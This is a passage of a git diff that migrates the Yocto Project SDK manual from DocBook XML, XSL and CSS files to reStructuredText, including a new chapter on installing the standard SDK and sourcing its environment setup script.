-                Download the kernel, root filesystem, and any other files you
-                need for your process.
-                <note>
-                    To use the root filesystem in QEMU, you need to extract it.
-                    See the
-                    "<link linkend='sdk-extracting-the-root-filesystem'>Extracting the Root Filesystem</link>"
-                    section for information on how to extract the root
-                    filesystem.
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Develop and Test your Application:</emphasis>
-                At this point, you have the tools to develop your application.
-                If you need to separately install and use the QEMU emulator,
-                you can go to
-                <ulink url='http://wiki.qemu.org/Main_Page'>QEMU Home Page</ulink>
-                to download and learn about the emulator.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-manual-qemu'>Using the Quick EMUlator (QEMU)</ulink>"
-                chapter in the Yocto Project Development Tasks Manual
-                for information on using QEMU within the Yocto
-                Project.
-                </para></listitem>
-        </orderedlist>
-    </para>
-
-    <para>
-        The remainder of this manual describes how to use the extensible
-        and standard SDKs.
-        Information also exists in appendix form that describes how you can
-        build, install, and modify an SDK.
-    </para>
-</section>
-
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-manual-customization.xsl b/documentation/sdk-manual/sdk-manual-customization.xsl
deleted file mode 100644
index efa8a84bbb..0000000000
--- a/documentation/sdk-manual/sdk-manual-customization.xsl
+++ /dev/null
@@ -1,26 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'sdk-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel">A</xsl:param>
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/sdk-manual/sdk-manual.rst b/documentation/sdk-manual/sdk-manual.rst
new file mode 100644
index 0000000000..177826edf3
--- /dev/null
+++ b/documentation/sdk-manual/sdk-manual.rst
@@ -0,0 +1,22 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+========================================================================================
+Yocto Project Application Development and the Extensible Software Development Kit (eSDK)
+========================================================================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   sdk-intro
+   sdk-extensible
+   sdk-using
+   sdk-working-projects
+   sdk-appendix-obtain
+   sdk-appendix-customizing
+   sdk-appendix-customizing-standard
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/sdk-manual/sdk-manual.xml b/documentation/sdk-manual/sdk-manual.xml
deleted file mode 100755
index 1bcc0c853f..0000000000
--- a/documentation/sdk-manual/sdk-manual.xml
+++ /dev/null
@@ -1,178 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='sdk-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/sdk-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-            Yocto Project Application Development and the Extensible Software Development Kit (eSDK)
-        </title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>The initial document released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-       </revhistory>
-
-    <copyright>
-      <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-        Permission is granted to copy, distribute and/or modify this document under
-        the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</emphasis>
-                       manual is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="sdk-intro.xml"/>
-
-    <xi:include href="sdk-extensible.xml"/>
-
-    <xi:include href="sdk-using.xml"/>
-
-    <xi:include href="sdk-working-projects.xml"/>
-
-    <xi:include href="sdk-appendix-obtain.xml"/>
-
-    <xi:include href="sdk-appendix-customizing.xml"/>
-
-    <xi:include href="sdk-appendix-customizing-standard.xml"/>
-
-<!--    <index id='index'>
-      <title>Index</title>
-    </index>
--->
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-style.css b/documentation/sdk-manual/sdk-style.css
deleted file mode 100644
index 52518964ca..0000000000
--- a/documentation/sdk-manual/sdk-style.css
+++ /dev/null
@@ -1,988 +0,0 @@
-/*
-   Generic XHTML / DocBook XHTML CSS Stylesheet.
-
-   Browser wrangling and typographic design by
-      Oyvind Kolas / pippin@gimp.org
-
-   Customised for Poky by
-      Matthew Allum / mallum@o-hand.com
-
-   Thanks to:
-     Liam R. E. Quin
-     William Skaggs
-     Jakub Steiner
-
-   Structure
-   ---------
-
-   The stylesheet is divided into the following sections:
-
-       Positioning
-          Margins, paddings, width, font-size, clearing.
-       Decorations
-          Borders, style
-       Colors
-          Colors
-       Graphics
-          Graphical backgrounds
-       Nasty IE tweaks
-          Workarounds needed to make it work in internet explorer,
-          currently makes the stylesheet non validating, but up until
-          this point it is validating.
-       Mozilla extensions
-          Transparency for footer
-	  Rounded corners on boxes
-
-*/
-
-
-  /*************** /
- /  Positioning   /
-/ ***************/
-
-body {
-  font-family: Verdana, Sans, sans-serif;
-
-  min-width: 640px;
-  width: 80%;
-  margin:  0em auto;
-  padding: 2em 5em 5em 5em;
-  color: #333;
-}
-
-h1,h2,h3,h4,h5,h6,h7 {
-  font-family: Arial, Sans;
-  color: #00557D;
-  clear: both;
-}
-
-h1 {
-  font-size: 2em;
-  text-align: left;
-  padding: 0em 0em 0em 0em;
-  margin: 2em 0em 0em 0em;
-}
-
-h2.subtitle {
-  margin: 0.10em 0em 3.0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 1.8em;
-  padding-left: 20%;
-  font-weight: normal;
-  font-style: italic;
-}
-
-h2 {
-  margin: 2em 0em 0.66em 0em;
-  padding: 0.5em 0em 0em 0em;
-  font-size: 1.5em;
-  font-weight: bold;
-}
-
-h3.subtitle {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-  font-size: 142.14%;
-  text-align: right;
-}
-
-h3 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 140%;
-  font-weight: bold;
-}
-
-h4 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 120%;
-  font-weight: bold;
-}
-
-h5 {
-  margin: 1em 0em 0.5em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-h6 {
-  margin: 1em 0em 0em 0em;
-  padding: 1em 0em 0em 0em;
-  font-size: 110%;
-  font-weight: bold;
-}
-
-.authorgroup {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  padding-top: 256px;
-  background-image: url("figures/sdk-title.png");
-  background-position: left top;
-  margin-top: -256px;
-  padding-right: 50px;
-  margin-left: 0px;
-  text-align: right;
-  width: 740px;
-}
-
-h3.author {
-  margin: 0em 0me 0em 0em;
-  padding: 0em 0em 0em 0em;
-  font-weight: normal;
-  font-size: 100%;
-  color: #333;
-  clear: both;
-}
-
-.author tt.email {
-  font-size: 66%;
-}
-
-.titlepage hr {
-  width: 0em;
-  clear: both;
-}
-
-.revhistory {
-  padding-top: 2em;
-  clear: both;
-}
-
-.toc,
-.list-of-tables,
-.list-of-examples,
-.list-of-figures {
-  padding: 1.33em 0em 2.5em 0em;
-  color: #00557D;
-}
-
-.toc p,
-.list-of-tables p,
-.list-of-figures p,
-.list-of-examples p {
-  padding: 0em 0em 0em 0em;
-  padding: 0em 0em 0.3em;
-  margin: 1.5em 0em 0em 0em;
-}
-
-.toc p b,
-.list-of-tables p b,
-.list-of-figures p b,
-.list-of-examples p b{
-  font-size: 100.0%;
-  font-weight: bold;
-}
-
-.toc dl,
-.list-of-tables dl,
-.list-of-figures dl,
-.list-of-examples dl {
-  margin: 0em 0em 0.5em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dt {
-  margin: 0em 0em 0em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.toc dd {
-  margin: 0em 0em 0em 2.6em;
-  padding: 0em 0em 0em 0em;
-}
-
-div.glossary dl,
-div.variablelist dl {
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  font-weight: normal;
-  width: 20em;
-  text-align: right;
-}
-
-.variablelist dl dt {
-  margin-top: 0.5em;
-}
-
-.glossary dl dd,
-.variablelist dl dd {
-  margin-top: -1em;
-  margin-left: 25.5em;
-}
-
-.glossary dd p,
-.variablelist dd p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-
-div.calloutlist table td {
-  padding: 0em 0em 0em 0em;
-  margin: 0em 0em 0em 0em;
-}
-
-div.calloutlist table td p {
-  margin-top: 0em;
-  margin-bottom: 1em;
-}
-
-div p.copyright {
-  text-align: left;
-}
-
-div.legalnotice p.legalnotice-title {
-  margin-bottom: 0em;
-}
-
-p {
-  line-height: 1.5em;
-  margin-top: 0em;
-
-}
-
-dl {
-  padding-top: 0em;
-}
-
-hr {
-  border: solid 1px;
-}
-
-
-.mediaobject,
-.mediaobjectco {
-  text-align: center;
-}
-
-img {
-  border: none;
-}
-
-ul {
-  padding: 0em 0em 0em 1.5em;
-}
-
-ul li {
-  padding: 0em 0em 0em 0em;
-}
-
-ul li p {
-  text-align: left;
-}
-
-table {
-  width :100%;
-}
-
-th {
-  padding: 0.25em;
-  text-align: left;
-  font-weight: normal;
-  vertical-align: top;
-}
-
-td {
-  padding: 0.25em;
-  vertical-align: top;
-}
-
-p a[id] {
-  margin: 0px;
-  padding: 0px;
-  display: inline;
-  background-image: none;
-}
-
-a {
-  text-decoration: underline;
-  color: #444;
-}
-
-pre {
-    overflow: auto;
-}
-
-a:hover {
-  text-decoration: underline;
-  /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
-   appears by itself and when hovered over with
-   the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
-  margin: 1em 0em;
-  padding: 1em;
-  page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
-    padding-top: 0em;
-    margin-top: 0em;
-    font-size: 100%;
-    font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p  {
-  text-align: center;
-  font-size: 80%;
-  padding-top: 0.5em;
-  padding-bottom: 0.5em;
-}
-
-.epigraph {
-  padding-left: 55%;
-  margin-bottom: 1em;
-}
-
-.epigraph p {
-  text-align: left;
-}
-
-.epigraph .quote {
-  font-style: italic;
-}
-.epigraph .attribution {
-  font-style: normal;
-  text-align: right;
-}
-
-span.application {
-  font-style: italic;
-}
-
-.programlisting {
-  font-family: monospace;
-  font-size: 80%;
-  white-space: pre;
-  margin: 1.33em 0em;
-  padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
-  margin-top: 1em;
-  margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
-  border: none;
-  width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  padding: 0.8em 0.0em 0.0em 0.0em;
-  margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
-  margin-top: 0.5em;
-  margin-bottom: 0.5em;
-  padding-right: 1em;
-  text-align: left;
-}
-
-.acronym {
-  text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
-  padding: 0.09em 0.3em;
-  margin: 0em;
-}
-
-.itemizedlist li {
-  clear: none;
-}
-
-.filename {
-  font-size: medium;
-  font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
-  position: absolute;
-  left: 0em;
-  top: 0em;
-  width: 100%;
-  background-color: #cdf;
-  width: 100%;
-}
-
-div.navfooter, div.footing{
-  position: fixed;
-  left: 0em;
-  bottom: 0em;
-  background-color: #eee;
-  width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
-  font-size: 66%;
-}
-
-div.navheader table th {
-  /*font-family: Georgia, Times, serif;*/
-  /*font-size: x-large;*/
-  font-size: 80%;
-}
-
-div.navheader table {
-  border-left: 0em;
-  border-right: 0em;
-  border-top: 0em;
-  width: 100%;
-}
-
-div.navfooter table {
-  border-left: 0em;
-  border-right: 0em;
-  border-bottom: 0em;
-  width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
-  color: #777;
-  text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
-  color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
-  color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
-  text-decoration: underline;
-  background-color: transparent;
-  color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
-  display: none;
-}
-
-
-.qandaset tr.question td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
-  margin: 0em 0em 1em 0em;
-  padding: 0em 0em 0em 0em;
-}
-.answer td {
-  padding-bottom: 1.5em;
-}
-
-.emphasis {
-  font-weight: bold;
-}
-
-
-  /************* /
- / decorations  /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
-    border: none;
-}
-
-/*
-h1 {
-  border: none;
-}
-
-h2 {
-  border-top: solid 0.2em;
-  border-bottom: solid 0.06em;
-}
-
-h3 {
-  border-top: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h4 {
-  border: 0em;
-  border-bottom: solid 0.06em;
-}
-
-h5 {
-  border: 0em;
-}
-*/
-
-.programlisting {
-  border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
-  border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
-  border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom: 1px solid;
-}
-
-.question td {
-  border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
-  border: 1px solid;
-}
-
-
-div.navheader, div.heading{
-  border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
-  border-top: 1px solid;
-}
-
-  /********* /
- /  colors  /
-/ *********/
-
-body {
-  color: #333;
-  background: white;
-}
-
-a {
-  background: transparent;
-}
-
-a:hover {
-  background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
-  background-color: transparent;
-}
-
-hr {
-  border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
-  border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.writernotes {
-  color: #ff0000;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/sdk-manual/sdk-using.rst b/documentation/sdk-manual/sdk-using.rst
new file mode 100644
index 0000000000..4b151e45cb
--- /dev/null
+++ b/documentation/sdk-manual/sdk-using.rst
@@ -0,0 +1,159 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+**********************
+Using the Standard SDK
+**********************
+
+This chapter describes the standard SDK and how to install it.
+Information includes unique installation and setup aspects for the
+standard SDK.
+
+.. note::
+
+   For a side-by-side comparison of main features supported for a
+   standard SDK as compared to an extensible SDK, see the "
+   Introduction
+   " section.
+
+You can use a standard SDK to work on Makefile and Autotools-based
+projects. See the "`Using the SDK Toolchain
+Directly <#sdk-working-projects>`__" chapter for more information.
+
+.. _sdk-standard-sdk-intro:
+
+Why use the Standard SDK and What is in It?
+===========================================
+
+The Standard SDK provides a cross-development toolchain and libraries
+tailored to the contents of a specific image. You would use the Standard
+SDK if you want a more traditional toolchain experience as compared to
+the extensible SDK, which provides an internal build system and the
+``devtool`` functionality.
+
+The installed Standard SDK consists of several files and directories.
+Basically, it contains an SDK environment setup script, some
+configuration files, and host and target root filesystems to support
+usage. You can see the directory structure in the "`Installed Standard
+SDK Directory
+Structure <#sdk-installed-standard-sdk-directory-structure>`__" section.
+
+.. _sdk-installing-the-sdk:
+
+Installing the SDK
+==================
+
+The first thing you need to do is install the SDK on your :term:`Build
+Host` by running the ``*.sh`` installation script.
+
+You can download a tarball installer, which includes the pre-built
+toolchain, the ``runqemu`` script, and support files from the
+appropriate :yocto_dl:`toolchain </releases/yocto/yocto-3.1.2/toolchain/>` directory within
+the Index of Releases. Toolchains are available for several 32-bit and
+64-bit architectures with the ``x86_64`` directories, respectively. The
+toolchains the Yocto Project provides are based off the
+``core-image-sato`` and ``core-image-minimal`` images and contain
+libraries appropriate for developing against that image.
+
+The names of the tarball installer scripts are such that a string
+representing the host system appears first in the filename and then is
+immediately followed by a string representing the target architecture.
+::
+
+   poky-glibc-host_system-image_type-arch-toolchain-release_version.sh
+
+   Where:
+       host_system is a string representing your development system:
+
+                  i686 or x86_64.
+
+       image_type is the image for which the SDK was built:
+
+                  core-image-minimal or core-image-sato.
+
+       arch is a string representing the tuned target architecture:
+
+                  aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon.
+
+       release_version is a string representing the release number of the Yocto Project:
+
+                  3.1.2, 3.1.2+snapshot
+
+For example, the following SDK installer is for a 64-bit
+development host system and a i586-tuned target architecture based off
+the SDK for ``core-image-sato`` and using the current DISTRO snapshot:
+::
+
+   poky-glibc-x86_64-core-image-sato-i586-toolchain-DISTRO.sh
+
+.. note::
+
+   As an alternative to downloading an SDK, you can build the SDK
+   installer. For information on building the installer, see the "
+   Building an SDK Installer
+   " section.
+
+The SDK and toolchains are self-contained and by default are installed
+into the ``poky_sdk`` folder in your home directory. You can choose to
+install the extensible SDK in any location when you run the installer.
+However, because files need to be written under that directory during
+the normal course of operation, the location you choose for installation
+must be writable for whichever users need to use the SDK.
+
+The following command shows how to run the installer given a toolchain
+tarball for a 64-bit x86 development host system and a 64-bit x86 target
+architecture. The example assumes the SDK installer is located in
+``~/Downloads/`` and has execution rights.
+
+.. note::
+
+   If you do not have write permissions for the directory into which you
+   are installing the SDK, the installer notifies you and exits. For
+   that case, set up the proper permissions in the directory and run the
+   installer again.
+
+::
+
+   $ ./Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-3.1.2.sh
+   Poky (Yocto Project Reference Distro) SDK installer version 3.1.2
+   ===============================================================
+   Enter target directory for SDK (default: /opt/poky/3.1.2):
+   You are about to install the SDK to "/opt/poky/3.1.2". Proceed [Y/n]? Y
+   Extracting SDK........................................ ..............................done
+   Setting it up...done
+   SDK has been successfully set up and is ready to be used.
+   Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+    $ . /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+Again, reference the "`Installed Standard SDK Directory
+Structure <#sdk-installed-standard-sdk-directory-structure>`__" section
+for more details on the resulting directory structure of the installed
+SDK.
+
+.. _sdk-running-the-sdk-environment-setup-script:
+
+Running the SDK Environment Setup Script
+========================================
+
+Once you have the SDK installed, you must run the SDK environment setup
+script before you can actually use the SDK. This setup script resides in
+the directory you chose when you installed the SDK, which is either the
+default ``/opt/poky/3.1.2`` directory or the directory you chose during
+installation.
+
+Before running the script, be sure it is the one that matches the
+architecture for which you are developing. Environment setup scripts
+begin with the string "``environment-setup``" and include as part of
+their name the tuned target architecture. As an example, the following
+commands set the working directory to where the SDK was installed and
+then source the environment setup script. In this example, the setup
+script is for an IA-based target machine using i586 tuning:
+::
+
+   $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+When you run the
+setup script, the same environment variables are defined as are when you
+run the setup script for an extensible SDK. See the "`Running the
+Extensible SDK Environment Setup
+Script <#sdk-running-the-extensible-sdk-environment-setup-script>`__"
+section for more information.
diff --git a/documentation/sdk-manual/sdk-using.xml b/documentation/sdk-manual/sdk-using.xml
deleted file mode 100644
index 66b15cd6ce..0000000000
--- a/documentation/sdk-manual/sdk-using.xml
+++ /dev/null
@@ -1,200 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
